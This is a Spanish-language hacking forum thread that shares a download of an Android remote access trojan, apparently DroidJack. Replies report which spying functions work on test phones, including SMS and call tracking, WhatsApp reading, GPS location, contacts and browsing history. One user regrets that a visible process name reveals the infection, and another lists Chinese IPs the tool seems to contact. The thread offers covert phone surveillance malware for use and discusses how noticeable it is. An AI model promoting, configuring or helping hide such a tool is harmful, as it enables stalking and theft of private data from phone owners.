Aquí os traigo este RAT para Android.

Imagen

Imagen


Como siempre recomiendo utilizar en entornos virtuales.
Cambiar el no-ip antes de testear.

Descarga:
[Enlace externo eliminado para invitados]
Sin duda, uno aportazo.
"Concentrarse en las fortalezas, reconocer las debilidades, las oportunidades y tomar la guardia contra las amenazas."

―Sun Tzu
O_O Gracias maestro
"He who fights monsters should see to it that he himself does not become a monster. And if you gaze for long into an abyss, the abyss gazes also into you."
- Friedrich Nietzsche
Lo he probado y funciona todo bien.

Pero pienso que hace conecciones a IPs en China.
221.194.44.173
222.215.230.95
61.240.144.66:60000
121.37.60.18:6000
27.207.135.25:62921
222.186.42.237:58727
y sempre aparecen mas

Puede ser que no sean de lo DJ, pero de lo próprio JAVA que hace las conectiones a IP chinos?

Alguien lo puede probar a 100%


Gracias
Bueno a ver... detallo mi experiencia testeado con huawey Y210 sin rootear y con Samsung S5 rooteado

File Voyager : OK
Sms Tracker: OK
Call Manager: OK
Whatsapp Reader: Fail / Ok S5 rooteado
Contact Browser: OK
Browse History: OK
App Manager: OK
Gps Pinpoing : OK
Remote Ears : Fail
Remote Eyes: Fail
Browser: OK
Message Teaster: OK
Details Info: OK

A mi la opcion binder no me funciono, no me genera ningun apk mas alla de que DJ dice apk done, la opcion stealer del build tampoco me funciono.

Conecta bien, rapido y estable, no se pierde los remotos como con otros de su estilo, pero la gran pega es que en el celular si se fijan en los servicios en ejecucion , no solo figura la apk que creamos sino que debajo en proceso te pone "net.droidjack.server"
Osea que, por mas que la mayoria de sus funciones corran correcta, de nada vale si te muestra ese detalle. Saludos
Muchas gracias por el aporte amigo, yo lo he provado y funciona de maravilla, pero lo que he notado que al movil que inyecta le funde mas rapido la bateria....
a alguno le pasa??
Responder

Volver a “Troyanos y Herramientas”